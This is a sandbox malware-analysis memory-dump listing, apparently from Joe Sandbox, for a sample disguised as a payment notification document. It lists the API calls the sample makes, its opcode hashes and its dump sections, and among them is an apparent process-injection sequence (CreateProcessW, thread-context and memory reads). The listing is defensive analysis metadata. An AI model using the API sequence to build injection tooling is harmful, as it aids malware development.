                                                                              • GetLastError.KERNEL32(?,009185CC,?,009A8CC8,0000000C), ref: 0091870E
                                                                              • __dosmaperr.LIBCMT ref: 00918739
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                                              • String ID:
                                                                              • API String ID: 2583163307-0
                                                                              • Opcode ID: d6e94fe3be6e3d8f8bad6b367dc2933c3930e50cf701ab8474e663960e15e94b
                                                                              • Instruction ID: a2d63d2faafd98d406fd72768246b3ff325e2f441b0e632ccbd508e0f8a5f17e
                                                                              • Opcode Fuzzy Hash: d6e94fe3be6e3d8f8bad6b367dc2933c3930e50cf701ab8474e663960e15e94b
                                                                              • Instruction Fuzzy Hash: 67014E3370562896D665633469497FF6B4D4BC17B4F3A021EF8389B1D2DEA1CCC2A150
                                                                              APIs
                                                                              • __Init_thread_footer.LIBCMT ref: 008F17F6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Init_thread_footer
                                                                              • String ID: CALL
                                                                              • API String ID: 1385522511-4196123274
                                                                              • Opcode ID: e8a9a4a5df90c698c745d96397e13698fa890d8c98c847d7af50eecd1471e734
                                                                              • Instruction ID: 1ccef47778a186a0d2029ede60ddb28bf5c4c13c0e7b23114d1dd0ff452d9ac6
                                                                              • Opcode Fuzzy Hash: e8a9a4a5df90c698c745d96397e13698fa890d8c98c847d7af50eecd1471e734
                                                                              • Instruction Fuzzy Hash: F1227C70608209DFCB14DF28C484A2ABBF1FF99354F14892DF696CB261D775E845CB92
                                                                              APIs
                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 00922C8C
                                                                                • Part of subcall function 008E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E3A97,?,?,008E2E7F,?,?,?,00000000), ref: 008E3AC2
                                                                                • Part of subcall function 008E2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008E2DC4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Name$Path$FileFullLongOpen
                                                                              • String ID: X
                                                                              • API String ID: 779396738-3081909835
                                                                              • Opcode ID: ddefdb7a4d56278dd2090d9fba325aeb10c1c3de737a69e3064f33c4c547e571
                                                                              • Instruction ID: 964928d853704931e82e3b1da3ec130545d4262568ed5c1728abd8656d587051
                                                                              • Opcode Fuzzy Hash: ddefdb7a4d56278dd2090d9fba325aeb10c1c3de737a69e3064f33c4c547e571
                                                                              • Instruction Fuzzy Hash: B621C671A002989FCB01DF99C809BEE7BFCEF4A314F004059E405E7241DBB499898BA1
                                                                              APIs
                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008E3908
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: IconNotifyShell_
                                                                              • String ID:
                                                                              • API String ID: 1144537725-0
                                                                              • Opcode ID: 97ef991649ebd9fbb8db2b33e8cdcc23203b2cc0c0fe61476acd485610c9ef7b
                                                                              • Instruction ID: b5428bb382779d9cb9e871911a91288d1b18eeb494255cc7dd74fa3c24e66ba3
                                                                              • Opcode Fuzzy Hash: 97ef991649ebd9fbb8db2b33e8cdcc23203b2cc0c0fe61476acd485610c9ef7b
                                                                              • Instruction Fuzzy Hash: F031C3B15083408FD720DF25D8987A7BBE8FB4A718F00092EF699C3250E771AE44CB52
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,008E949C,?,00008000), ref: 008E5773
                                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,008E949C,?,00008000), ref: 00924052
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: a606f727b42db7be00bc70b52ac62e12e64b864a3a878421095caecf5db43353
                                                                              • Instruction ID: da21d498a9ad9ec19ddde5d79d721c46977761eace11a3fc89128937a11237d4
                                                                              • Opcode Fuzzy Hash: a606f727b42db7be00bc70b52ac62e12e64b864a3a878421095caecf5db43353
                                                                              • Instruction Fuzzy Hash: 69015631185225B6E3304A2ADC0EF977F58EF02BB5F148314BE5C9A1E0C7B45494DB90
                                                                              APIs
                                                                              • __Init_thread_footer.LIBCMT ref: 008EBB4E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Init_thread_footer
                                                                              • String ID:
                                                                              • API String ID: 1385522511-0
                                                                              • Opcode ID: 639ed348f62e2b8871abd4428bad85e632286768e06f3658ff3aca860ad702f2
                                                                              • Instruction ID: e1fe0821bb9c7ffe50a7f2377d38f00b4259febf2567b741c6bcd33ea541f7bc
                                                                              • Opcode Fuzzy Hash: 639ed348f62e2b8871abd4428bad85e632286768e06f3658ff3aca860ad702f2
                                                                              • Instruction Fuzzy Hash: 4232EC30A04259DFCB20CF59C8A4ABFB7B9FF86314F148069EA15AB261D774ED41CB91
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 041BECCB
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 041BED61
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 041BED83
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1707992061.00000000041BD000.00000040.00000020.00020000.00000000.sdmp, Offset: 041BD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_41bd000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                              • Instruction ID: ddc3a6ddbde0af3e071e595ee71e0286fad9b37a98be89485a4be96e40c6d815
                                                                              • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                              • Instruction Fuzzy Hash: 0612DC24A24658C6EB24DF64D8507DEB232EF68300F1090E9D10DEB7A5E77A5E81CF5A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString
                                                                              • String ID:
                                                                              • API String ID: 2948472770-0
                                                                              • Opcode ID: c092f5a3c1fff569df3eda2d55e40b3a1a19746db69b255a5d3852c60283645b
                                                                              • Instruction ID: 91727ec2e22e734e53316ab8e8a7dc06eaf57e1ca0b1031b0530c3277bd63571
                                                                              • Opcode Fuzzy Hash: c092f5a3c1fff569df3eda2d55e40b3a1a19746db69b255a5d3852c60283645b
                                                                              • Instruction Fuzzy Hash: DBD16934A0420AEFCB14DFD9D8819ADFBB5FF49314F14415AE915AB391EB30AD81CB91
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction ID: 19f16fd574091cf678089c7e52cb3d374d5b42f3bdf4c1a8329ff0381ed8f3c2
                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction Fuzzy Hash: 0E31F274A0011EDBD718DF69D480969FBA2FF49304B2486A5EA09CB656E731EEC1CBD0
                                                                              APIs
                                                                                • Part of subcall function 008E4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,008E4EDD,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E9C
                                                                                • Part of subcall function 008E4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008E4EAE
                                                                                • Part of subcall function 008E4E90: FreeLibrary.KERNEL32(00000000,?,?,008E4EDD,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4EC0
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4EFD
                                                                                • Part of subcall function 008E4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00923CDE,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E62
                                                                                • Part of subcall function 008E4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008E4E74
                                                                                • Part of subcall function 008E4E59: FreeLibrary.KERNEL32(00000000,?,?,00923CDE,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E87
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Library$Load$AddressFreeProc
                                                                              • String ID:
                                                                              • API String ID: 2632591731-0
                                                                              • Opcode ID: 384d7d359e7bd34eb3e97d35faed440e36ade25832396be65988fb0bffeddc49
                                                                              • Instruction ID: 410d3f0fd7d8bad53b9ffe1352a41a433cdf0d5bb12cf1c4dc246e2921a2c780
                                                                              • Opcode Fuzzy Hash: 384d7d359e7bd34eb3e97d35faed440e36ade25832396be65988fb0bffeddc49
                                                                              • Instruction Fuzzy Hash: AF11E332610205AACF14FB6ADC02FAD77A5FF81B14F10882DF54AE61C1EE749A459751
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: __wsopen_s
                                                                              • String ID:
                                                                              • API String ID: 3347428461-0
                                                                              • Opcode ID: a7417fdac8ee5af79f9636175ab1472027bb937f4e199420493ab7bb886b1dc8
                                                                              • Instruction ID: 8df5a26e7c9643bd1664bd64ebcc83ca2c43283cb6a26ac9ca5192c6048375b1
                                                                              • Opcode Fuzzy Hash: a7417fdac8ee5af79f9636175ab1472027bb937f4e199420493ab7bb886b1dc8
                                                                              • Instruction Fuzzy Hash: 58114875A0410AAFCF05DF58E941ADB7BF9EF48310F104059F808AB352DA30DA11DBA4
                                                                              APIs
                                                                                • Part of subcall function 00914C7D: RtlAllocateHeap.NTDLL(00000008,008E1129,00000000,?,00912E29,00000001,00000364,?,?,?,0090F2DE,00913863,009B1444,?,008FFDF5,?), ref: 00914CBE
                                                                              • _free.LIBCMT ref: 0091506C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap_free
                                                                              • String ID:
                                                                              • API String ID: 614378929-0
                                                                              • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                              • Instruction ID: 1d2729c05727d938cabde99966e51720ac0ecb83c97a84c8e72dcc4a8515f11f
                                                                              • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                              • Instruction Fuzzy Hash: 71012B72304708ABE3218F559841ADAFBECFBC9370F66051DE194932C0E6306845C6B4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                              • Instruction ID: 06f5a3f64737e294255afaffbf0d893b761c9d39ddeb74f3f0606aea3518063d
                                                                              • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                              • Instruction Fuzzy Hash: 69F02832611A189ED7313A69AC05B9B339C9FD2335F100F15F431D71D2CF75E84186A5
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen
                                                                              • String ID:
                                                                              • API String ID: 176396367-0
                                                                              • Opcode ID: 10c9670d2fbedfdd3de16219deb42da2e1224f8142166eedce00cb261b24ac3f
                                                                              • Instruction ID: a24ce0393d4c53c4eb706203481c6c20804736ae3d49168d44e91bd8564fd5c7
                                                                              • Opcode Fuzzy Hash: 10c9670d2fbedfdd3de16219deb42da2e1224f8142166eedce00cb261b24ac3f
                                                                              • Instruction Fuzzy Hash: 88F0A4B26016046ED7259F29D806B6ABB98EF84760F10852AFB19CB1D1DB71E51086A0
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000008,008E1129,00000000,?,00912E29,00000001,00000364,?,?,?,0090F2DE,00913863,009B1444,?,008FFDF5,?), ref: 00914CBE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 311a99f5267ca7087aee1c41914c691aab27b2675ed3eda767eebaabf900ea71
                                                                              • Instruction ID: fc4647b72c511a57fba32a46852a5b3a57586ae49ae36da7b72186986cef8eb7
                                                                              • Opcode Fuzzy Hash: 311a99f5267ca7087aee1c41914c691aab27b2675ed3eda767eebaabf900ea71
                                                                              • Instruction Fuzzy Hash: ABF0E93174622C6BDB215F669C09BDA378CBF957B0B148125BDA9A65D0CA30D88096E0
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000000,?,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6,?,008E1129), ref: 00913852
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 949542fa992ac8339cca61fb5dd72c49195c38ca560ccaafc0f420c93595d499
                                                                              • Instruction ID: f8884b01ee2ea1e994d23fe7d97739796a8870a45df305c689955a5df57e81bd
                                                                              • Opcode Fuzzy Hash: 949542fa992ac8339cca61fb5dd72c49195c38ca560ccaafc0f420c93595d499
                                                                              • Instruction Fuzzy Hash: A6E0E53130422C9AD63127669C04BDA377CAB827B0F05C1A0BD1992CD0DB10DE8181E0
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(?,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4F6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID:
                                                                              • API String ID: 3664257935-0
                                                                              • Opcode ID: 032ff3e6a0c1f92005c9d63d9806bb02a2f16dbbab393008f39df00fff3759d9
                                                                              • Instruction ID: d90350bcfebac2d20f774561b9dec24329e37a17f818ee33feeae29d90d01794
                                                                              • Opcode Fuzzy Hash: 032ff3e6a0c1f92005c9d63d9806bb02a2f16dbbab393008f39df00fff3759d9
                                                                              • Instruction Fuzzy Hash: A6F01C71105791CFDB349F66D494812B7E4FF15719310997EE1EE82511CB359C84DB50
                                                                              APIs
                                                                              • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0092EE51,009A3630,00000002), ref: 0094CD26
                                                                                • Part of subcall function 0094CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0094CD19,?,?,?), ref: 0094CC59
                                                                                • Part of subcall function 0094CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0094CD19,?,?,?,?,0092EE51,009A3630,00000002), ref: 0094CC6E
                                                                                • Part of subcall function 0094CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0094CD19,?,?,?,?,0092EE51,009A3630,00000002), ref: 0094CC7A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
